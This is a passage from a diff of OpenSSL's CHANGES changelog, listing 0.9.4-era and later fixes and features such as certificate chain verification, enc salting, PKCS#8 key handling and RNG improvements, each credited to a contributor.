+  *) Add variants des_set_key_checked and des_set_key_unchecked of
+     des_set_key (aka des_key_sched).  Global variable des_check_key
+     decides which of these is called by des_set_key; this way
+     des_check_key behaves as it always did, but applications and
+     the library itself, which was buggy for des_check_key == 1,
+     have a cleaner way to pick the version they need.
+     [Bodo Moeller]
+
+  *) New function PKCS12_newpass() which changes the password of a
+     PKCS12 structure.
+     [Steve Henson]
+
+  *) Modify X509_TRUST and X509_PURPOSE so it also uses a static and
+     dynamic mix. In both cases the ids can be used as an index into the
+     table. Also modified the X509_TRUST_add() and X509_PURPOSE_add()
+     functions so they accept a list of the field values and the
+     application doesn't need to directly manipulate the X509_TRUST
+     structure.
+     [Steve Henson]
+
+  *) Modify the ASN1_STRING_TABLE stuff so it also uses bsearch and doesn't
+     need initialising.
+     [Steve Henson]
+
+  *) Modify the way the V3 extension code looks up extensions. This now
+     works in a similar way to the object code: we have some "standard"
+     extensions in a static table which is searched with OBJ_bsearch()
+     and the application can add dynamic ones if needed. The file
+     crypto/x509v3/ext_dat.h now has the info: this file needs to be
+     updated whenever a new extension is added to the core code and kept
+     in ext_nid order. There is a simple program 'tabtest.c' which checks
+     this. New extensions are not added too often so this file can readily
+     be maintained manually.
+
+     There are two big advantages in doing things this way. The extensions
+     can be looked up immediately and no longer need to be "added" using
+     X509V3_add_standard_extensions(): this function now does nothing.
+     [Side note: I get *lots* of email saying the extension code doesn't
+      work because people forget to call this function]
+     Also no dynamic allocation is done unless new extensions are added:
+     so if we don't add custom extensions there is no need to call
+     X509V3_EXT_cleanup().
+     [Steve Henson]
+
+  *) Modify enc utility's salting as follows: make salting the default. Add a
+     magic header, so unsalted files fail gracefully instead of just decrypting
+     to garbage. This is because not salting is a big security hole, so people
+     should be discouraged from doing it.
+     [Ben Laurie]
+
+  *) Fixes and enhancements to the 'x509' utility. It allowed a message
+     digest to be passed on the command line but it only used this
+     parameter when signing a certificate. Modified so all relevant
+     operations are affected by the digest parameter including the
+     -fingerprint and -x509toreq options. Also -x509toreq choked if a
+     DSA key was used because it didn't fix the digest.
+     [Steve Henson]
+
+  *) Initial certificate chain verify code. Currently tests the untrusted
+     certificates for consistency with the verify purpose (which is set
+     when the X509_STORE_CTX structure is set up) and checks the pathlength.
+
+     There is a NO_CHAIN_VERIFY compilation option to keep the old behaviour:
+     this is because it will reject chains with invalid extensions whereas
+     every previous version of OpenSSL and SSLeay made no checks at all.
+
+     Trust code: checks the root CA for the relevant trust settings. Trust
+     settings have an initial value consistent with the verify purpose: e.g.
+     if the verify purpose is for SSL client use it expects the CA to be
+     trusted for SSL client use. However the default value can be changed to
+     permit custom trust settings: one example of this would be to only trust
+     certificates from a specific "secure" set of CAs.
+
+     Also added X509_STORE_CTX_new() and X509_STORE_CTX_free() functions
+     which should be used for version portability: especially since the
+     verify structure is likely to change more often now.
+
+     SSL integration. Add purpose and trust to SSL_CTX and SSL and functions
+     to set them. If not set then assume SSL clients will verify SSL servers
+     and vice versa.
+
+     Two new options to the verify program: -untrusted allows a set of
+     untrusted certificates to be passed in and -purpose which sets the
+     intended purpose of the certificate. If a purpose is set then the
+     new chain verify code is used to check extension consistency.
+     [Steve Henson]
+
+  *) Support for the authority information access extension.
+     [Steve Henson]
+
+  *) Modify RSA and DSA PEM read routines to transparently handle
+     PKCS#8 format private keys. New *_PUBKEY_* functions that handle
+     public keys in a format compatible with certificate
+     SubjectPublicKeyInfo structures. Unfortunately there were already
+     functions called *_PublicKey_* which used various odd formats so
+     these are retained for compatibility: however the DSA variants were
+     never in a public release so they have been deleted. Changed dsa/rsa
+     utilities to handle the new format: note no releases ever handled public
+     keys so we should be OK.
+
+     The primary motivation for this change is to avoid the same fiasco
+     that dogs private keys: there are several incompatible private key
+     formats some of which are standard and some OpenSSL specific and
+     require various evil hacks to allow partial transparent handling and
+     even then it doesn't work with DER formats. Given the option anything
+     other than PKCS#8 should be dumped: but the other formats have to
+     stay in the name of compatibility.
+
+     With public keys and the benefit of hindsight one standard format 
+     is used which works with EVP_PKEY, RSA or DSA structures: though
+     it clearly returns an error if you try to read the wrong kind of key.
+
+     Added a -pubkey option to the 'x509' utility to output the public key.
+     Also rename the EVP_PKEY_get_*() to EVP_PKEY_rget_*()
+     (renamed to EVP_PKEY_get1_*() in the OpenSSL 0.9.5 release) and add
+     EVP_PKEY_rset_*() functions (renamed to EVP_PKEY_set1_*())
+     that do the same as the EVP_PKEY_assign_*() except they up the
+     reference count of the added key (they don't "swallow" the
+     supplied key).
+     [Steve Henson]
+
+  *) Fixes to crypto/x509/by_file.c the code to read in certificates and
+     CRLs would fail if the file contained no certificates or no CRLs:
+     added a new function to read in both types and return the number
+     read: this means that if none are read it will be an error. The
+     DER versions of the certificate and CRL reader would always fail
+     because it isn't possible to mix certificates and CRLs in DER format
+     without choking one or the other routine. Changed this to just read
+     a certificate: this is the best we can do. Also modified the code
+     in apps/verify.c to take notice of return codes: it was previously
+     attempting to read in certificates from NULL pointers and ignoring
+     any errors: this is one reason why the cert and CRL reader seemed
+     to work. It doesn't check return codes from the default certificate
+     routines: these may well fail if the certificates aren't installed.
+     [Steve Henson]
+
+  *) Code to support otherName option in GeneralName.
+     [Steve Henson]
+
+  *) First update to verify code. Change the verify utility
+     so it warns if it is passed a self signed certificate:
+     for consistency with the normal behaviour. X509_verify
+     has been modified to it will now verify a self signed
+     certificate if *exactly* the same certificate appears
+     in the store: it was previously impossible to trust a
+     single self signed certificate. This means that:
+     openssl verify ss.pem
+     now gives a warning about a self signed certificate but
+     openssl verify -CAfile ss.pem ss.pem
+     is OK.
+     [Steve Henson]
+
+  *) For servers, store verify_result in SSL_SESSION data structure
+     (and add it to external session representation).
+     This is needed when client certificate verifications fails,
+     but an application-provided verification callback (set by
+     SSL_CTX_set_cert_verify_callback) allows accepting the session
+     anyway (i.e. leaves x509_store_ctx->error != X509_V_OK
+     but returns 1): When the session is reused, we have to set
+     ssl->verify_result to the appropriate error code to avoid
+     security holes.
+     [Bodo Moeller, problem pointed out by Lutz Jaenicke]
+
+  *) Fix a bug in the new PKCS#7 code: it didn't consider the
+     case in PKCS7_dataInit() where the signed PKCS7 structure
+     didn't contain any existing data because it was being created.
+     [Po-Cheng Chen <pocheng@nst.com.tw>, slightly modified by Steve Henson]
+
+  *) Add a salt to the key derivation routines in enc.c. This
+     forms the first 8 bytes of the encrypted file. Also add a
+     -S option to allow a salt to be input on the command line.
+     [Steve Henson]
+
+  *) New function X509_cmp(). Oddly enough there wasn't a function
+     to compare two certificates. We do this by working out the SHA1
+     hash and comparing that. X509_cmp() will be needed by the trust
+     code.
+     [Steve Henson]
+
+  *) SSL_get1_session() is like SSL_get_session(), but increments
+     the reference count in the SSL_SESSION returned.
+     [Geoff Thorpe <geoff@eu.c2.net>]
+
+  *) Fix for 'req': it was adding a null to request attributes.
+     Also change the X509_LOOKUP and X509_INFO code to handle
+     certificate auxiliary information.
+     [Steve Henson]
+
+  *) Add support for 40 and 64 bit RC2 and RC4 algorithms: document
+     the 'enc' command.
+     [Steve Henson]
+
+  *) Add the possibility to add extra information to the memory leak
+     detecting output, to form tracebacks, showing from where each
+     allocation was originated: CRYPTO_push_info("constant string") adds
+     the string plus current file name and line number to a per-thread
+     stack, CRYPTO_pop_info() does the obvious, CRYPTO_remove_all_info()
+     is like calling CYRPTO_pop_info() until the stack is empty.
+     Also updated memory leak detection code to be multi-thread-safe.
+     [Richard Levitte]
+
+  *) Add options -text and -noout to pkcs7 utility and delete the
+     encryption options which never did anything. Update docs.
+     [Steve Henson]
+
+  *) Add options to some of the utilities to allow the pass phrase
+     to be included on either the command line (not recommended on
+     OSes like Unix) or read from the environment. Update the
+     manpages and fix a few bugs.
+     [Steve Henson]
+
+  *) Add a few manpages for some of the openssl commands.
+     [Steve Henson]
+
+  *) Fix the -revoke option in ca. It was freeing up memory twice,
+     leaking and not finding already revoked certificates.
+     [Steve Henson]
+
+  *) Extensive changes to support certificate auxiliary information.
+     This involves the use of X509_CERT_AUX structure and X509_AUX
+     functions. An X509_AUX function such as PEM_read_X509_AUX()
+     can still read in a certificate file in the usual way but it
+     will also read in any additional "auxiliary information". By
+     doing things this way a fair degree of compatibility can be
+     retained: existing certificates can have this information added
+     using the new 'x509' options. 
+
+     Current auxiliary information includes an "alias" and some trust
+     settings. The trust settings will ultimately be used in enhanced
+     certificate chain verification routines: currently a certificate
+     can only be trusted if it is self signed and then it is trusted
+     for all purposes.
+     [Steve Henson]
+
+  *) Fix assembler for Alpha (tested only on DEC OSF not Linux or *BSD).
+     The problem was that one of the replacement routines had not been working
+     since SSLeay releases.  For now the offending routine has been replaced
+     with non-optimised assembler.  Even so, this now gives around 95%
+     performance improvement for 1024 bit RSA signs.
+     [Mark Cox]
+
+  *) Hack to fix PKCS#7 decryption when used with some unorthodox RC2 
+     handling. Most clients have the effective key size in bits equal to
+     the key length in bits: so a 40 bit RC2 key uses a 40 bit (5 byte) key.
+     A few however don't do this and instead use the size of the decrypted key
+     to determine the RC2 key length and the AlgorithmIdentifier to determine
+     the effective key length. In this case the effective key length can still
+     be 40 bits but the key length can be 168 bits for example. This is fixed
+     by manually forcing an RC2 key into the EVP_PKEY structure because the
+     EVP code can't currently handle unusual RC2 key sizes: it always assumes
+     the key length and effective key length are equal.
+     [Steve Henson]
+
+  *) Add a bunch of functions that should simplify the creation of 
+     X509_NAME structures. Now you should be able to do:
+     X509_NAME_add_entry_by_txt(nm, "CN", MBSTRING_ASC, "Steve", -1, -1, 0);
+     and have it automatically work out the correct field type and fill in
+     the structures. The more adventurous can try:
+     X509_NAME_add_entry_by_txt(nm, field, MBSTRING_UTF8, str, -1, -1, 0);
+     and it will (hopefully) work out the correct multibyte encoding.
+     [Steve Henson]
+
+  *) Change the 'req' utility to use the new field handling and multibyte
+     copy routines. Before the DN field creation was handled in an ad hoc
+     way in req, ca, and x509 which was rather broken and didn't support
+     BMPStrings or UTF8Strings. Since some software doesn't implement
+     BMPStrings or UTF8Strings yet, they can be enabled using the config file
+     using the dirstring_type option. See the new comment in the default
+     openssl.cnf for more info.
+     [Steve Henson]
+
+  *) Make crypto/rand/md_rand.c more robust:
+     - Assure unique random numbers after fork().
+     - Make sure that concurrent threads access the global counter and
+       md serializably so that we never lose entropy in them
+       or use exactly the same state in multiple threads.
+       Access to the large state is not always serializable because
+       the additional locking could be a performance killer, and
+       md should be large enough anyway.
+     [Bodo Moeller]
+
+  *) New file apps/app_rand.c with commonly needed functionality
+     for handling the random seed file.
+
+     Use the random seed file in some applications that previously did not:
+          ca,
+          dsaparam -genkey (which also ignored its '-rand' option), 
+          s_client,
+          s_server,
+          x509 (when signing).
+     Except on systems with /dev/urandom, it is crucial to have a random
+     seed file at least for key creation, DSA signing, and for DH exchanges;
+     for RSA signatures we could do without one.
+
+     gendh and gendsa (unlike genrsa) used to read only the first byte
+     of each file listed in the '-rand' option.  The function as previously
+     found in genrsa is now in app_rand.c and is used by all programs
+     that support '-rand'.
+     [Bodo Moeller]
+
+  *) In RAND_write_file, use mode 0600 for creating files;
+     don't just chmod when it may be too late.
+     [Bodo Moeller]
+
+  *) Report an error from X509_STORE_load_locations
+     when X509_LOOKUP_load_file or X509_LOOKUP_add_dir failed.
+     [Bill Perry]
+
+  *) New function ASN1_mbstring_copy() this copies a string in either
+     ASCII, Unicode, Universal (4 bytes per character) or UTF8 format
+     into an ASN1_STRING type. A mask of permissible types is passed
+     and it chooses the "minimal" type to use or an error if not type
+     is suitable.
+     [Steve Henson]
+
+  *) Add function equivalents to the various macros in asn1.h. The old
+     macros are retained with an M_ prefix. Code inside the library can
+     use the M_ macros. External code (including the openssl utility)
+     should *NOT* in order to be "shared library friendly".
+     [Steve Henson]
+
+  *) Add various functions that can check a certificate's extensions
+     to see if it usable for various purposes such as SSL client,
+     server or S/MIME and CAs of these types. This is currently 
+     VERY EXPERIMENTAL but will ultimately be used for certificate chain
+     verification. Also added a -purpose flag to x509 utility to
+     print out all the purposes.
+     [Steve Henson]
+
+  *) Add a CRYPTO_EX_DATA to X509 certificate structure and associated
+     functions.
+     [Steve Henson]
+
+  *) New X509V3_{X509,CRL,REVOKED}_get_d2i() functions. These will search
+     for, obtain and decode and extension and obtain its critical flag.
+     This allows all the necessary extension code to be handled in a
+     single function call.
+     [Steve Henson]
+
+  *) RC4 tune-up featuring 30-40% performance improvement on most RISC
+     platforms. See crypto/rc4/rc4_enc.c for further details.
+     [Andy Polyakov]
+
+  *) New -noout option to asn1parse. This causes no output to be produced
+     its main use is when combined with -strparse and -out to extract data
+     from a file (which may not be in ASN.1 format).
+     [Steve Henson]
+
+  *) Fix for pkcs12 program. It was hashing an invalid certificate pointer
+     when producing the local key id.
+     [Richard Levitte <levitte@stacken.kth.se>]
+
+  *) New option -dhparam in s_server. This allows a DH parameter file to be
+     stated explicitly. If it is not stated then it tries the first server
+     certificate file. The previous behaviour hard coded the filename
+     "server.pem".
+     [Steve Henson]
+
+  *) Add -pubin and -pubout options to the rsa and dsa commands. These allow
+     a public key to be input or output. For example:
+     openssl rsa -in key.pem -pubout -out pubkey.pem
+     Also added necessary DSA public key functions to handle this.
+     [Steve Henson]
+
+  *) Fix so PKCS7_dataVerify() doesn't crash if no certificates are contained
+     in the message. This was handled by allowing
+     X509_find_by_issuer_and_serial() to tolerate a NULL passed to it.
+     [Steve Henson, reported by Sampo Kellomaki <sampo@mail.neuronio.pt>]
+
+  *) Fix for bug in d2i_ASN1_bytes(): other ASN1 functions add an extra null
+     to the end of the strings whereas this didn't. This would cause problems
+     if strings read with d2i_ASN1_bytes() were later modified.
+     [Steve Henson, reported by Arne Ansper <arne@ats.cyber.ee>]
+
+  *) Fix for base64 decode bug. When a base64 bio reads only one line of
+     data and it contains EOF it will end up returning an error. This is
+     caused by input 46 bytes long. The cause is due to the way base64
+     BIOs find the start of base64 encoded data. They do this by trying a
+     trial decode on each line until they find one that works. When they
+     do a flag is set and it starts again knowing it can pass all the
+     data directly through the decoder. Unfortunately it doesn't reset
+     the context it uses. This means that if EOF is reached an attempt
+     is made to pass two EOFs through the context and this causes the
+     resulting error. This can also cause other problems as well. As is
+     usual with these problems it takes *ages* to find and the fix is
+     trivial: move one line.
+     [Steve Henson, reported by ian@uns.ns.ac.yu (Ivan Nejgebauer) ]
+
+  *) Ugly workaround to get s_client and s_server working under Windows. The
+     old code wouldn't work because it needed to select() on sockets and the
+     tty (for keypresses and to see if data could be written). Win32 only
+     supports select() on sockets so we select() with a 1s timeout on the
+     sockets and then see if any characters are waiting to be read, if none
+     are present then we retry, we also assume we can always write data to
+     the tty. This isn't nice because the code then blocks until we've
+     received a complete line of data and it is effectively polling the
+     keyboard at 1s intervals: however it's quite a bit better than not
+     working at all :-) A dedicated Windows application might handle this
+     with an event loop for example.
+     [Steve Henson]
+
+  *) Enhance RSA_METHOD structure. Now there are two extra methods, rsa_sign
+     and rsa_verify. When the RSA_FLAGS_SIGN_VER option is set these functions
+     will be called when RSA_sign() and RSA_verify() are used. This is useful
+     if rsa_pub_dec() and rsa_priv_enc() equivalents are not available.
+     For this to work properly RSA_public_decrypt() and RSA_private_encrypt()
+     should *not* be used: RSA_sign() and RSA_verify() must be used instead.
+     This necessitated the support of an extra signature type NID_md5_sha1
+     for SSL signatures and modifications to the SSL library to use it instead
+     of calling RSA_public_decrypt() and RSA_private_encrypt().
+     [Steve Henson]
+
+  *) Add new -verify -CAfile and -CApath options to the crl program, these
+     will lookup a CRL issuers certificate and verify the signature in a
+     similar way to the verify program. Tidy up the crl program so it
+     no longer accesses structures directly. Make the ASN1 CRL parsing a bit
+     less strict. It will now permit CRL extensions even if it is not
+     a V2 CRL: this will allow it to tolerate some broken CRLs.
+     [Steve Henson]
+
+  *) Initialize all non-automatic variables each time one of the openssl
+     sub-programs is started (this is necessary as they may be started
+     multiple times from the "OpenSSL>" prompt).
+     [Lennart Bang, Bodo Moeller]
+
+  *) Preliminary compilation option RSA_NULL which disables RSA crypto without
+     removing all other RSA functionality (this is what NO_RSA does). This
+     is so (for example) those in the US can disable those operations covered
+     by the RSA patent while allowing storage and parsing of RSA keys and RSA
+     key generation.
+     [Steve Henson]
+
+  *) Non-copying interface to BIO pairs.
+     (still largely untested)
+     [Bodo Moeller]
+
+  *) New function ANS1_tag2str() to convert an ASN1 tag to a descriptive
+     ASCII string. This was handled independently in various places before.
+     [Steve Henson]
+
+  *) New functions UTF8_getc() and UTF8_putc() that parse and generate
+     UTF8 strings a character at a time.
+     [Steve Henson]
+
+  *) Use client_version from client hello to select the protocol
+     (s23_srvr.c) and for RSA client key exchange verification
+     (s3_srvr.c), as required by the SSL 3.0/TLS 1.0 specifications.
+     [Bodo Moeller]
+
+  *) Add various utility functions to handle SPKACs, these were previously
+     handled by poking round in the structure internals. Added new function
+     NETSCAPE_SPKI_print() to print out SPKAC and a new utility 'spkac' to
+     print, verify and generate SPKACs. Based on an original idea from
+     Massimiliano Pala <madwolf@comune.modena.it> but extensively modified.
+     [Steve Henson]
+
+  *) RIPEMD160 is operational on all platforms and is back in 'make test'.
+     [Andy Polyakov]
+
+  *) Allow the config file extension section to be overwritten on the
+     command line. Based on an original idea from Massimiliano Pala
+     <madwolf@comune.modena.it>. The new option is called -extensions
+     and can be applied to ca, req and x509. Also -reqexts to override
+     the request extensions in req and -crlexts to override the crl extensions
+     in ca.
+     [Steve Henson]
+
+  *) Add new feature to the SPKAC handling in ca.  Now you can include
+     the same field multiple times by preceding it by "XXXX." for example:
+     1.OU="Unit name 1"
+     2.OU="Unit name 2"
+     this is the same syntax as used in the req config file.
+     [Steve Henson]
+
+  *) Allow certificate extensions to be added to certificate requests. These
+     are specified in a 'req_extensions' option of the req section of the
+     config file. They can be printed out with the -text option to req but
+     are otherwise ignored at present.
+     [Steve Henson]
+
+  *) Fix a horrible bug in enc_read() in crypto/evp/bio_enc.c: if the first
+     data read consists of only the final block it would not decrypted because
+     EVP_CipherUpdate() would correctly report zero bytes had been decrypted.
+     A misplaced 'break' also meant the decrypted final block might not be
+     copied until the next read.
+     [Steve Henson]
+
+  *) Initial support for DH_METHOD. Again based on RSA_METHOD. Also added
+     a few extra parameters to the DH structure: these will be useful if
+     for example we want the value of 'q' or implement X9.42 DH.
+     [Steve Henson]
+
+  *) Initial support for DSA_METHOD. This is based on the RSA_METHOD and
+     provides hooks that allow the default DSA functions or functions on a
+     "per key" basis to be replaced. This allows hardware acceleration and
+     hardware key storage to be handled without major modification to the
+     library. Also added low level modexp hooks and CRYPTO_EX structure and 
+     associated functions.
+     [Steve Henson]
+
+  *) Add a new flag to memory BIOs, BIO_FLAG_MEM_RDONLY. This marks the BIO
+     as "read only": it can't be written to and the buffer it points to will
+     not be freed. Reading from a read only BIO is much more efficient than
+     a normal memory BIO. This was added because there are several times when
+     an area of memory needs to be read from a BIO. The previous method was
+     to create a memory BIO and write the data to it, this results in two
+     copies of the data and an O(n^2) reading algorithm. There is a new
+     function BIO_new_mem_buf() which creates a read only memory BIO from
+     an area of memory. Also modified the PKCS#7 routines to use read only
+     memory BIOs.
+     [Steve Henson]
+
+  *) Bugfix: ssl23_get_client_hello did not work properly when called in
+     state SSL23_ST_SR_CLNT_HELLO_B, i.e. when the first 7 bytes of
+     a SSLv2-compatible client hello for SSLv3 or TLSv1 could be read,
+     but a retry condition occured while trying to read the rest.
+     [Bodo Moeller]
+
+  *) The PKCS7_ENC_CONTENT_new() function was setting the content type as
+     NID_pkcs7_encrypted by default: this was wrong since this should almost
+     always be NID_pkcs7_data. Also modified the PKCS7_set_type() to handle
+     the encrypted data type: this is a more sensible place to put it and it
+     allows the PKCS#12 code to be tidied up that duplicated this
+     functionality.
+     [Steve Henson]
+
+  *) Changed obj_dat.pl script so it takes its input and output files on
+     the command line. This should avoid shell escape redirection problems
+     under Win32.
+     [Steve Henson]
+
+  *) Initial support for certificate extension requests, these are included
+     in things like Xenroll certificate requests. Included functions to allow
+     extensions to be obtained and added.
+     [Steve Henson]
+
+  *) -crlf option to s_client and s_server for sending newlines as
+     CRLF (as required by many protocols).
+     [Bodo Moeller]
+
+ Changes between 0.9.3a and 0.9.4  [09 Aug 1999]
+  
+  *) Install libRSAglue.a when OpenSSL is built with RSAref.
+     [Ralf S. Engelschall]
+
+  *) A few more ``#ifndef NO_FP_API / #endif'' pairs for consistency.
+     [Andrija Antonijevic <TheAntony2@bigfoot.com>]
+
+  *) Fix -startdate and -enddate (which was missing) arguments to 'ca'
+     program.
+     [Steve Henson]
+
+  *) New function DSA_dup_DH, which duplicates DSA parameters/keys as
+     DH parameters/keys (q is lost during that conversion, but the resulting
+     DH parameters contain its length).
+
+     For 1024-bit p, DSA_generate_parameters followed by DSA_dup_DH is
+     much faster than DH_generate_parameters (which creates parameters
+     where p = 2*q + 1), and also the smaller q makes DH computations
+     much more efficient (160-bit exponentiation instead of 1024-bit
+     exponentiation); so this provides a convenient way to support DHE
+     ciphersuites in SSL/TLS servers (see ssl/ssltest.c).  It is of
+     utter importance to use
+         SSL_CTX_set_options(s_ctx, SSL_OP_SINGLE_DH_USE);
+     or
+         SSL_set_options(s_ctx, SSL_OP_SINGLE_DH_USE);
+     when such DH parameters are used, because otherwise small subgroup
+     attacks may become possible!
+     [Bodo Moeller]
+
+  *) Avoid memory leak in i2d_DHparams.
+     [Bodo Moeller]
+
+  *) Allow the -k option to be used more than once in the enc program:
+     this allows the same encrypted message to be read by multiple recipients.
+     [Steve Henson]
+
+  *) New function OBJ_obj2txt(buf, buf_len, a, no_name), this converts
+     an ASN1_OBJECT to a text string. If the "no_name" parameter is set then
+     it will always use the numerical form of the OID, even if it has a short
+     or long name.
+     [Steve Henson]
+
+  *) Added an extra RSA flag: RSA_FLAG_EXT_PKEY. Previously the rsa_mod_exp
+     method only got called if p,q,dmp1,dmq1,iqmp components were present,
+     otherwise bn_mod_exp was called. In the case of hardware keys for example
+     no private key components need be present and it might store extra data
+     in the RSA structure, which cannot be accessed from bn_mod_exp.
+     By setting RSA_FLAG_EXT_PKEY rsa_mod_exp will always be called for
+     private key operations.
+     [Steve Henson]
+
+  *) Added support for SPARC Linux.
+     [Andy Polyakov]
+
+  *) pem_password_cb function type incompatibly changed from
+          typedef int pem_password_cb(char *buf, int size, int rwflag);
+     to
+          ....(char *buf, int size, int rwflag, void *userdata);
+     so that applications can pass data to their callbacks:
+     The PEM[_ASN1]_{read,write}... functions and macros now take an
+     additional void * argument, which is just handed through whenever
+     the password callback is called.
+     [Damien Miller <dmiller@ilogic.com.au>; tiny changes by Bodo Moeller]
+
+     New function SSL_CTX_set_default_passwd_cb_userdata.
+
+     Compatibility note: As many C implementations push function arguments
+     onto the stack in reverse order, the new library version is likely to
+     interoperate with programs that have been compiled with the old
+     pem_password_cb definition (PEM_whatever takes some data that
+     happens to be on the stack as its last argument, and the callback
+     just ignores this garbage); but there is no guarantee whatsoever that
+     this will work.
+
+  *) The -DPLATFORM="\"$(PLATFORM)\"" definition and the similar -DCFLAGS=...
+     (both in crypto/Makefile.ssl for use by crypto/cversion.c) caused
+     problems not only on Windows, but also on some Unix platforms.
+     To avoid problematic command lines, these definitions are now in an
+     auto-generated file crypto/buildinf.h (created by crypto/Makefile.ssl
+     for standard "make" builds, by util/mk1mf.pl for "mk1mf" builds).
+     [Bodo Moeller]
+
+  *) MIPS III/IV assembler module is reimplemented.
+     [Andy Polyakov]
+
+  *) More DES library cleanups: remove references to srand/rand and
+     delete an unused file.
+     [Ulf Möller]
+
+  *) Add support for the the free Netwide assembler (NASM) under Win32,
+     since not many people have MASM (ml) and it can be hard to obtain.
+     This is currently experimental but it seems to work OK and pass all
+     the tests. Check out INSTALL.W32 for info.
+     [Steve Henson]
+
+  *) Fix memory leaks in s3_clnt.c: All non-anonymous SSL3/TLS1 connections
+     without temporary keys kept an extra copy of the server key,
+     and connections with temporary keys did not free everything in case
+     of an error.
+     [Bodo Moeller]
+
+  *) New function RSA_check_key and new openssl rsa option -check
+     for verifying the consistency of RSA keys.
+     [Ulf Moeller, Bodo Moeller]
+
+  *) Various changes to make Win32 compile work: 
+     1. Casts to avoid "loss of data" warnings in p5_crpt2.c
+     2. Change unsigned int to int in b_dump.c to avoid "signed/unsigned
+        comparison" warnings.
+     3. Add sk_<TYPE>_sort to DEF file generator and do make update.
+     [Steve Henson]
+
+  *) Add a debugging option to PKCS#5 v2 key generation function: when
+     you #define DEBUG_PKCS5V2 passwords, salts, iteration counts and
+     derived keys are printed to stderr.
+     [Steve Henson]
+
+  *) Copy the flags in ASN1_STRING_dup().
+     [Roman E. Pavlov <pre@mo.msk.ru>]
+
+  *) The x509 application mishandled signing requests containing DSA
+     keys when the signing key was also DSA and the parameters didn't match.
+
+     It was supposed to omit the parameters when they matched the signing key:
+     the verifying software was then supposed to automatically use the CA's
+     parameters if they were absent from the end user certificate.
+
+     Omitting parameters is no longer recommended. The test was also
+     the wrong way round! This was probably due to unusual behaviour in
+     EVP_cmp_parameters() which returns 1 if the parameters match. 
+     This meant that parameters were omitted when they *didn't* match and
+     the certificate was useless. Certificates signed with 'ca' didn't have
+     this bug.
+     [Steve Henson, reported by Doug Erickson <Doug.Erickson@Part.NET>]
+
+  *) Memory leak checking (-DCRYPTO_MDEBUG) had some problems.
+     The interface is as follows:
+     Applications can use
+         CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON) aka MemCheck_start(),
+         CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_OFF) aka MemCheck_stop();
+     "off" is now the default.
+     The library internally uses
+         CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_DISABLE) aka MemCheck_off(),
+         CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ENABLE) aka MemCheck_on()
+     to disable memory-checking temporarily.
+
+     Some inconsistent states that previously were possible (and were
+     even the default) are now avoided.
+
+     -DCRYPTO_MDEBUG_TIME is new and additionally stores the current time
+     with each memory chunk allocated; this is occasionally more helpful
+     than just having a counter.
+
+     -DCRYPTO_MDEBUG_THREAD is also new and adds the thread ID.
+
+     -DCRYPTO_MDEBUG_ALL enables all of the above, plus any future
+     extensions.
+     [Bodo Moeller]
+
+  *) Introduce "mode" for SSL structures (with defaults in SSL_CTX),
+     which largely parallels "options", but is for changing API behaviour,
+     whereas "options" are about protocol behaviour.
+     Initial "mode" flags are:
+
+     SSL_MODE_ENABLE_PARTIAL_WRITE   Allow SSL_write to report success when
+                                     a single record has been written.
+     SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER  Don't insist that SSL_write
+                                     retries use the same buffer location.
+                                     (But all of the contents must be
+                                     copied!)
+     [Bodo Moeller]
+
+  *) Bugfix: SSL_set_options ignored its parameter, only SSL_CTX_set_options
+     worked.
+
+  *) Fix problems with no-hmac etc.
+     [Ulf Möller, pointed out by Brian Wellington <bwelling@tislabs.com>]
+
+  *) New functions RSA_get_default_method(), RSA_set_method() and
+     RSA_get_method(). These allows replacement of RSA_METHODs without having
+     to mess around with the internals of an RSA structure.
+     [Steve Henson]
+
+  *) Fix memory leaks in DSA_do_sign and DSA_is_prime.
+     Also really enable memory leak checks in openssl.c and in some
+     test programs.
+     [Chad C. Mulligan, Bodo Moeller]
+
+  *) Fix a bug in d2i_ASN1_INTEGER() and i2d_ASN1_INTEGER() which can mess
+     up the length of negative integers. This has now been simplified to just
+     store the length when it is first determined and use it later, rather
+     than trying to keep track of where data is copied and updating it to
+     point to the end.
+     [Steve Henson, reported by Brien Wheeler
+      <bwheeler@authentica-security.com>]
+
+  *) Add a new function PKCS7_signatureVerify. This allows the verification
+     of a PKCS#7 signature but with the signing certificate passed to the
+     function itself. This contrasts with PKCS7_dataVerify which assumes the
+     certificate is present in the PKCS#7 structure. This isn't always the
+     case: certificates can be omitted from a PKCS#7 structure and be
+     distributed by "out of band" means (such as a certificate database).
+     [Steve Henson]
+
+  *) Complete the PEM_* macros with DECLARE_PEM versions to replace the
+     function prototypes in pem.h, also change util/mkdef.pl to add the
+     necessary function names. 
+     [Steve Henson]
+
+  *) mk1mf.pl (used by Windows builds) did not properly read the
+     options set by Configure in the top level Makefile, and Configure
+     was not even able to write more than one option correctly.
+     Fixed, now "no-idea no-rc5 -DCRYPTO_MDEBUG" etc. works as intended.
+     [Bodo Moeller]
+
+  *) New functions CONF_load_bio() and CONF_load_fp() to allow a config
+     file to be loaded from a BIO or FILE pointer. The BIO version will
+     for example allow memory BIOs to contain config info.
+     [Steve Henson]
+
+  *) New function "CRYPTO_num_locks" that returns CRYPTO_NUM_LOCKS.
+     Whoever hopes to achieve shared-library compatibility across versions
+     must use this, not the compile-time macro.
+     (Exercise 0.9.4: Which is the minimum library version required by
+     such programs?)
+     Note: All this applies only to multi-threaded programs, others don't
+     need locks.
+     [Bodo Moeller]
+
+  *) Add missing case to s3_clnt.c state machine -- one of the new SSL tests
+     through a BIO pair triggered the default case, i.e.
+     SSLerr(...,SSL_R_UNKNOWN_STATE).
+     [Bodo Moeller]
+
+  *) New "BIO pair" concept (crypto/bio/bss_bio.c) so that applications
+     can use the SSL library even if none of the specific BIOs is
+     appropriate.
+     [Bodo Moeller]
+
+  *) Fix a bug in i2d_DSAPublicKey() which meant it returned the wrong value
+     for the encoded length.
+     [Jeon KyoungHo <khjeon@sds.samsung.co.kr>]
+
+  *) Add initial documentation of the X509V3 functions.
+     [Steve Henson]
+
+  *) Add a new pair of functions PEM_write_PKCS8PrivateKey() and 
+     PEM_write_bio_PKCS8PrivateKey() that are equivalent to
+     PEM_write_PrivateKey() and PEM_write_bio_PrivateKey() but use the more
+     secure PKCS#8 private key format with a high iteration count.
+     [Steve Henson]
+
+  *) Fix determination of Perl interpreter: A perl or perl5
+     _directory_ in $PATH was also accepted as the interpreter.
+     [Ralf S. Engelschall]
+
+  *) Fix demos/sign/sign.c: well there wasn't anything strictly speaking
